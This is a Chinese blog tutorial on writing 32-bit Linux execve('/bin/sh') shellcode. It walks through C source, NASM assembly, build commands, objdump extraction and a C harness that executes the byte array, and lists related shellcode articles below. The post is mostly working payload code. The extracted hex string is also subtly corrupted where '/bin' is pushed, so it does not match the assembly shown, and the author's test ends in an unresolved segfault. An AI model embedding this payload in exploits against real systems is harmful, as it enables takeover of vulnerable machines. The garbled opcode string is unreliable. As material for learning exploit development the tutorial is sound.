shellcode编写

最新推荐文章于 2024-04-23 08:49:24 发布
最新推荐文章于 2024-04-23 08:49:24 发布
阅读量1k 收藏 5
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39153421/article/details/89709677
版权

1.前言

漏洞利用最重要的就是shellcode的编写,漏洞发现者在漏洞发现之初并不会给出完整的shellcode,所以我们要学会自己编写shellcode。

注:shellcode中不能出现NULL和/x00,存在其一再利用的时候会被截断。

2.什么是Shellcode

shellcode是用作利用软件漏洞的有效载荷的一小段代码,因为它通常启动一个命令shell,攻击者可以从中控制受攻击的机器,所以称他为shellcode。但是任何执行类似任务的代码都可以称为shellcode。 因为有效载荷的功能不仅限于一个shell。

shellcode基本的编写方式有以下三种:

① 直接编写十六进制操作码。

② 使用c语言编写程序,然后进行编译,最后进行反汇编来获取汇编指令和十六进制操作码。

③ 编写汇编程序,将该程序汇编,然后从二进制中提取十六进制操作码。

第一种方法很极端,直接编写十六进制操作码是一件非常难得事情。下面我将带大家一步步去编写自己的shellcode。

3.execve系统调用

在Linux系统上执行程序的方式有多种,但是其中使用最广泛的一种方式就是通过借助execve系统调用。32位linux内核的系统调用表可以通过网站来查询,我们这里获得shell只需用到execve函数,我们首先来看看execve的使用方法。

这里execve函数系统调用号为11,图中也给出了对应寄存器中保存的参数值。

c语言实现execve系统调用创建shell

#include <unistd.h>

int main()
{
    char * shell[2];
    shell[0]="/bin/sh";
    shell[1]=NULL;
    execve(shell[0],shell,NULL);
}

然后我们使用gcc编译器来编译一下:

gcc 4.c -o 4

成功执行创建一个shell。

转向汇编语言

前面我们已经使用c语言来实现了,现在我们就需要用汇编语言来重写execve系统调用,其实很简单。我们先来查看一下execve系统调用号:11

汇编代码重写:

首先我们将寄存器eax清零。

xor eax,eax

然后我们将寄存器eax进行入栈操作,其实就是将字符串末尾的空字符值入栈:

push eax

然后将//sh入栈(由于需要对齐,因此这里用了四个字节)第一个参数

push 0x68732f2f

最后将/bin入栈。

push 0x6e69622f

现在栈上已经有了全部所需数据,现在就是设置execve系统调用了。将/bin//sh存放到EBX寄存器,第2个参数

mov ebx,esp

压4字节的NULL,第3个参数,环境变量为 NULL

push eax
push ebx

把EBX地址存入ECX寄存器

mov ecx,esp
xor edx,edx
mov al,0xb  ;0xb表示其系统调用号的十六进制,execve的系统调用号为11
int 0x80    ;int 0x80软中断是系统中断,根据中断号和相关寄存器设置调用对应系统函数

完整代码如下:

section .text
global _start

_start:
xor eax,eax
push eax
push 0x68732f2f
push 0x6e69622f
mov ebx,esp
push eax
push ebx
mov ecx,esp
xor edx,edx
mov al,0xb
int 0x80

编译链接

首先使用nasm进行汇编

nasm -f elf 2.asm

(如果未安装nasm,通过sudo apt-get install nasm安装)

然后使用ld链接

ld -o 2 2.o

(提示不兼容的话用ld -m elf_i386 -o 2 2.o)

运行测试看看

4.提取十六进制操作码并测试Shellcode

用objdump工具的-d选项进行反汇编即可:

输入命令:

objdump -d 2

得到shellcode:”\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2\x6\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80”;

测试shellcode

首先我们将十六进制操作码放入一个名为shellcode[]的缓冲区中。

#include <stdio.h>

char shellcode[]=
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2\x6\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80";

int main()
{
    void (*fp) (void);
    fp=(void *)shellcode;
    fp();
}

然后通过gcc编译,测试,但是出现了段错误这种情况,上网查了一下,说是因为系统本身有数据区执行保护机制,导致在全局数据段的shellcode不能被运行,即出现段错误。

这里我们先安装一下execstack。

sudo apt-get install execstack

然后针对编译后的程序使用execstack

execstack -s 程序名

可是弄完之后仍然是段错误,不知道为啥!

你的支持是我最大的动力!

2.jpg支付宝
1.png微信
一梦不醒
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
网络攻防技术——shellcode编写
学习记录
02-27 3180
一、题目 shellcode广泛用于许多涉及代码注入的攻击中。编写shellcode是相当有挑战性的。虽然我们可以很容易地从互联网上找到现有的shellcode,但是能够从头开始编写我们自己的shellcode总是令人兴奋的。shellcode中涉及到几种有趣的技术。本实验室的目的是帮助学生理解这些技术,以便他们能够编写自己的shellcode编写shellcode有几个挑战,一个是确保二进制文件中没有0x00,另一个是找出命令中使用的数据的地址。第一个挑战不是很难解决,有几种方法可以解决它。第二个挑战
【网路攻防技术】实验五——shellcode编写实验
qq_45755706的博客
03-01 4538
文章目录一、实验题目二、实验步骤及结果Task1.a: The Entire ProcessTask 1.b. Eliminating Zeros from the CodeTask 1.c. Providing Arguments for System CallsTask 2: Using Code Segment 一、实验题目 shellcode广泛用于许多涉及代码注入的攻击中。编写shellcode是相当有挑战性的。虽然我们可以很容易地从互联网上找到现有的shellcode,但是能够从头开始编写我们自
Linux x86_64 shellcode编写
小立仔
07-06 1174
Linux x86_64 shellcode编写
Shellcode编写
最新发布
weixin_54452942的博客
04-23 1047
二是ESI寄存器的值自动增加32位,也就是当第一轮执行之后,esi中放的是下一个函数名称的地址,继续将其指向的内存空间的前四个字节送到eax中(也就是函数名称列表中的第一个函数名称的前四个字节),同时esi加4,指向了第二个函数名称的地址,一直向后比对,直到每个字节都比对成功后,此时的ecx中存的就是目标函数在函数名称列表中的位置。这个成员在PEB结构体中的偏移量是0x0C。在32位Windows系统中,FS寄存器指向TEB的起始地址,而在64位Windows系统中,GS寄存器指向TEB的起始地址。
手把手简易实现shellcode及详解
3-Number
06-22 6283
转载理由: 处于安全行业靠边产业,经常听和看到shellcode,但是只有模糊的认识,于是学习一把,毕竟C和汇编了解,开阔下视野; 转载于:http://blog.nsfocus.net/simple-realization-hand-handle-shellcode-detailed-explanation/?utm_source=tuicool&utm_medium=referral
如何编写并编译一个shellcode
dasgk的专栏
09-12 2319
最近开始再看LINUX了嘛(希望还不算太晚)。所以就找找文章,看有什么好的就贴到自己BLOG上来。 【实验环境】         虚拟机:VMware Workstation , Version: 5.5.3 build-34685         虚拟机OS:Redhat Linux 9.03简体中文版,X86-based PC         主机OS:Microsoft Window
Android系统shellcode编写.zip_android_shellcode
09-23
Android手机的普及,Android系统安全日益受人关注。漏洞攻防是安全的一大课题,其中自然少不了shellcode编写
Win 7下定位kernel32.dll基址及shellcode编写1
08-03
在Windows操作系统中,尤其是Windows 7环境下,动态定位kernel32.dll的基地址对于编写兼容性强的shellcode或恶意软件至关重要。kernel32.dll是Windows系统的核心动态链接库,提供了许多与用户界面、进程和线程管理、...
linux下shellcode编写手册
05-18
这是一本英文书籍,详细介绍了栈的结构,如何编制程序进行缓冲区溢出
shellcode 编写技术 缓冲区溢出教程
04-20
shellcode 编写技术 缓冲区溢出教程 缓冲区溢出是指当程序向缓冲区写入数据时 vượt过缓冲区的容量限制,导致溢出到相邻的内存区域中,可能会导致系统崩溃或其他安全问题。 Buffer Overflow(缓冲区溢出)是一种...
shellcode编写国外精典文档
04-05
shellcode编写国外精典文档,编写shellcode,必看
linux c语言shellcode,shellcode编写
weixin_36287955的博客
05-12 772
8种机械键盘轴体对比本人程序员,要买一个写代码的键盘,请问红轴和茶轴怎么选?​ shellcode可以用于在栈溢出或者堆溢出的漏洞中用于跳转后执行的代码。本文的代码是在ubuntu 18.04 64位的linux操作系统。​ 首先是一个用于执行shellcode的c语言程序:123456char shellcode[] = "";int (int argc, char...
(*(void(*)())&shellcode)();
qq_34071268的博客
07-18 245
(*(void(*)())&shellcode)();
Shellcode编写技术
lidatou的专栏
08-05 1879
前些日子在调试http://www.microsoft.com/technet/security/bulletin/MS03-015.asp 的时候遇到了比较苦恼的事情,那就是我通过覆盖了eip或者seh来得到执行代码的权利,但是 现在网上流行的shellcode不能满足我的
(*(void (*) () )shellcode) ();的含义
Yannie's Blog
12-07 983
我们在写执行shellcode的语句的时候,可以直接写成这样的一行 ( * (void ( * ) () )shellcode) () 那这一行又是什么意思呢? 我们来从简单的开始: typedef void (*Fun) (void)是什么意思呢? 这里我们就需要了解:typedef有一个用法,可以用来定义函数指针 此处 Fun 是指向这样一个函数的指针,该函数的返回值为void类型,函数没有参...
如何写一个shellcode
qq_40712959的博客
01-16 511
什么样的shellcode可以起到最大的破坏,那就是能够满足攻击者各种各样需要的shellcode,怎么才能满足各种各样的需要呢?调用shell。 如何写一个shellcode,以需要execve()系统调用的shellcode为例: %eax:eax寄存器需要存储11,这是execve()的系统调用号(system call number) %ebx:存储控制字符串“/bin/sh”的地址(e...
如何编写shellcode
weixin_30369041的博客
05-16 108
ShellCode编写就是将函数或变量在内存中的间接地址改为函数或变量在内存中的直接地址,直接调用! 以MessageBox函数为例进行讲解如下 新建shellcode.cpp: 编写代码如下: 运行结果: 将VC代码转换成汇编指令: 内存数据图: 函数的真实地址找到之后,修改代码如下: 将以上汇编指令转换成二进制数...
Windows 下 shellcode 编写
aptx4869_li的博客
06-16 2011
Windows下的shellcode编写首先,我们先了解一下shellcode是什么?Shellcode实际是一段代码(也可以是填充数据),是用来发送到服务器利用特定漏洞的代码,一般可以获取权限。另外,Shellcode一般是作为数据发送给受攻击服务器的。 Shellcode是溢出程序和蠕虫病毒的核心,提到它自然就会和漏洞联想在一起,毕竟Shellcode只对没有打补丁的主机有用武之地。网络上数...
使用C编译器编写shellcode
Tody Guo的专栏
12-08 1484
原文出处: Nick Harbour   译文出处: IDF徐文博 背景 有时候程序员们需要写一段独立于位置操作的代码,可当作一段数据写到其他进程或者网络中去。该类型代码在它诞生之初就被称为shellcode,在软件利用中黑客们以此获取到shell权限。方法就是通过这样或那样的恶意手法使得这段代码得以执行,完成它的使命。当然了,该代码仅能靠它自己,作者无法使用现代软件开发的实践来推

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值